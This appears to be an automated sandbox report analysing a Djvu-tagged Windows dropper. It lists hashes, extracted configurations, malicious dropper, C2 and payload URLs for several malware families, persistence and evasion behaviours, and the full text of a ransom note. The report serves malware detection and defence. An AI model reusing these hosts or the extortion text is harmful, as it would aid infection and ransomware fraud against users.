djvu | 8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd

Analysis

max time kernel
102s
max time network
167s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe
Size

8.0MB
MD5

3571023657f2af17848f582c38c242c8
SHA1

7243b8c78ea06663ca182c2922f966b197723a6c
SHA256

8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd
SHA512

c8564467299add7aa5b6a7be0b8f6e02d67836eb98477295adda6c14d61320a45c16c45c037e170a1ecfcd60c655c72fef7777e2c74cefa7d915dd10172c444b

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2516-283-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2516-278-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3548-277-0x0000000002230000-0x000000000234B000-memory.dmp	family_djvu
behavioral2/memory/2516-273-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2516-271-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3036-178-0x0000000002E10000-0x0000000003737000-memory.dmp	family_glupteba
behavioral2/memory/3036-179-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/1792-184-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/2256-196-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	1752	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5828	1752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5980	1752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4316	1752	schtasks.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 1128 created 3036 1128 svchost.exe Graphics.exe
PID 1128 created 2256 1128 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 1128 created 3036	1128	svchost.exe	Graphics.exe
PID 1128 created 2256	1128	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1180-235-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger
behavioral2/memory/1180-244-0x0000000000600000-0x0000000000644000-memory.dmp	family_onlylogger

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 30 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeFolder.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exeh7o35csDp3T7opPTqKp4RhrO.exe6l_6TITW6M_FWNyv9JNJWShr.exeEDUEUo_d_qvXV91VWNI_Kecc.exeycbHgGGWAHdsFMky2Z4JvH4A.exeXvXBF8YUd0oQvWpIWdAM70te.exeLArQdSTz9GSLeONJ_Pu1Dbtc.exeyJELtTPryMdnuZ3qwXJ3rGeB.exeEbCMBNv6S7MFZ2OS3eEGYonW.exe0ymbQYc8RsS99DBvOdYSQjSF.exeoqDAZds_7fr2iMuM3zYngwwO.exepZtyZVslug6pQkXi0VFh4_wm.exe95GYtErt11V9BcYEb0FsRiir.exeEaazESuGFEPWgefydKJP1kcG.exeCeHkR2XJS0DXOymV9vLuVJXq.exeqxdDrrCSi7btcmbP665oFDjD.exe

pid	process
3988	SoCleanInst.exe
3788	md9_1sjm.exe
432	Folder.exe
3036	Graphics.exe
2984	Updbdate.exe
3140	Folder.exe
3980	Install.exe
1196	Files.exe
2156	pub2.exe
3680	File.exe
800	jfiag3g_gg.exe
3624	jfiag3g_gg.exe
1792	Graphics.exe
2256	csrss.exe
3744	injector.exe
2384	h7o35csDp3T7opPTqKp4RhrO.exe
1180	6l_6TITW6M_FWNyv9JNJWShr.exe
528	EDUEUo_d_qvXV91VWNI_Kecc.exe
1616	ycbHgGGWAHdsFMky2Z4JvH4A.exe
820	XvXBF8YUd0oQvWpIWdAM70te.exe
432	LArQdSTz9GSLeONJ_Pu1Dbtc.exe
3580	yJELtTPryMdnuZ3qwXJ3rGeB.exe
3548	EbCMBNv6S7MFZ2OS3eEGYonW.exe
2536	0ymbQYc8RsS99DBvOdYSQjSF.exe
1796	oqDAZds_7fr2iMuM3zYngwwO.exe
1408	pZtyZVslug6pQkXi0VFh4_wm.exe
2848	95GYtErt11V9BcYEb0FsRiir.exe
2444	EaazESuGFEPWgefydKJP1kcG.exe
1856	CeHkR2XJS0DXOymV9vLuVJXq.exe
4100	qxdDrrCSi7btcmbP665oFDjD.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\0ymbQYc8RsS99DBvOdYSQjSF.exe	upx
C:\Users\Admin\Pictures\Adobe Films\0ymbQYc8RsS99DBvOdYSQjSF.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exeFolder.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	8430a16b0b19a1b87ef6bf62b6450be7df9c1a6405583474b40804ee6cf151bd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2544 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2544	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Graphics.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WitheredResonance = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

241 ipinfo.io
105 ipinfo.io
216 ipinfo.io
228 ipinfo.io
240 ipinfo.io
39 ip-api.com
104 ipinfo.io
214 ipinfo.io
255 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

pZtyZVslug6pQkXi0VFh4_wm.exe

pid process

1408 pZtyZVslug6pQkXi0VFh4_wm.exe
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
241	ipinfo.io
105	ipinfo.io
216	ipinfo.io
228	ipinfo.io
240	ipinfo.io
39	ip-api.com
104	ipinfo.io
214	ipinfo.io
255	ipinfo.io

pid	process
1408	pZtyZVslug6pQkXi0VFh4_wm.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
800	2544	WerFault.exe	rundll32.exe
432	3036	WerFault.exe	Graphics.exe
460	3036	WerFault.exe	Graphics.exe
1508	3036	WerFault.exe	Graphics.exe
824	3036	WerFault.exe	Graphics.exe
1084	3036	WerFault.exe	Graphics.exe
432	3036	WerFault.exe	Graphics.exe
3540	3036	WerFault.exe	Graphics.exe
1508	3036	WerFault.exe	Graphics.exe
3444	3036	WerFault.exe	Graphics.exe
860	3036	WerFault.exe	Graphics.exe
2376	3036	WerFault.exe	Graphics.exe
1256	3036	WerFault.exe	Graphics.exe
1424	3036	WerFault.exe	Graphics.exe
3776	3036	WerFault.exe	Graphics.exe
456	3036	WerFault.exe	Graphics.exe
3832	3036	WerFault.exe	Graphics.exe
2404	3036	WerFault.exe	Graphics.exe
432	3036	WerFault.exe	Graphics.exe
2320	3036	WerFault.exe	Graphics.exe
1652	3036	WerFault.exe	Graphics.exe
1780	3036	WerFault.exe	Graphics.exe
2308	1792	WerFault.exe	Graphics.exe
3624	1792	WerFault.exe	Graphics.exe
1092	1792	WerFault.exe	Graphics.exe
1652	1792	WerFault.exe	Graphics.exe
3140	1792	WerFault.exe	Graphics.exe
3544	1792	WerFault.exe	Graphics.exe
3164	1792	WerFault.exe	Graphics.exe
3540	1792	WerFault.exe	Graphics.exe
2376	1792	WerFault.exe	Graphics.exe
2264	1792	WerFault.exe	Graphics.exe
684	1792	WerFault.exe	Graphics.exe
2940	1792	WerFault.exe	Graphics.exe
1256	1792	WerFault.exe	Graphics.exe
1300	1792	WerFault.exe	Graphics.exe
3704	1792	WerFault.exe	Graphics.exe
3716	1792	WerFault.exe	Graphics.exe
2408	2256	WerFault.exe	csrss.exe
3280	2256	WerFault.exe	csrss.exe
1424	2256	WerFault.exe	csrss.exe
3580	2256	WerFault.exe	csrss.exe
1508	2256	WerFault.exe	csrss.exe
2192	2256	WerFault.exe	csrss.exe
2544	2256	WerFault.exe	csrss.exe
864	2256	WerFault.exe	csrss.exe
2444	2256	WerFault.exe	csrss.exe
528	2256	WerFault.exe	csrss.exe
2264	2256	WerFault.exe	csrss.exe
444	2256	WerFault.exe	csrss.exe
1908	2256	WerFault.exe	csrss.exe
1336	2256	WerFault.exe	csrss.exe
824	2256	WerFault.exe	csrss.exe
3708	2256	WerFault.exe	csrss.exe
2848	2256	WerFault.exe	csrss.exe
2024	2256	WerFault.exe	csrss.exe
2192	2256	WerFault.exe	csrss.exe
3640	2256	WerFault.exe	csrss.exe
3036	2256	WerFault.exe	csrss.exe
2940	2256	WerFault.exe	csrss.exe
864	2256	WerFault.exe	csrss.exe
444	2256	WerFault.exe	csrss.exe
3544	2256	WerFault.exe	csrss.exe
4608	1180	WerFault.exe	6l_6TITW6M_FWNyv9JNJWShr.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3832 schtasks.exe
4720 schtasks.exe
4988 schtasks.exe
5828 schtasks.exe
5980 schtasks.exe
4316 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3832 taskkill.exe

pid	process
3832	schtasks.exe
4720	schtasks.exe
4988	schtasks.exe
5828	schtasks.exe
5980	schtasks.exe
4316	schtasks.exe

pid	process
3832	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Graphics.exe
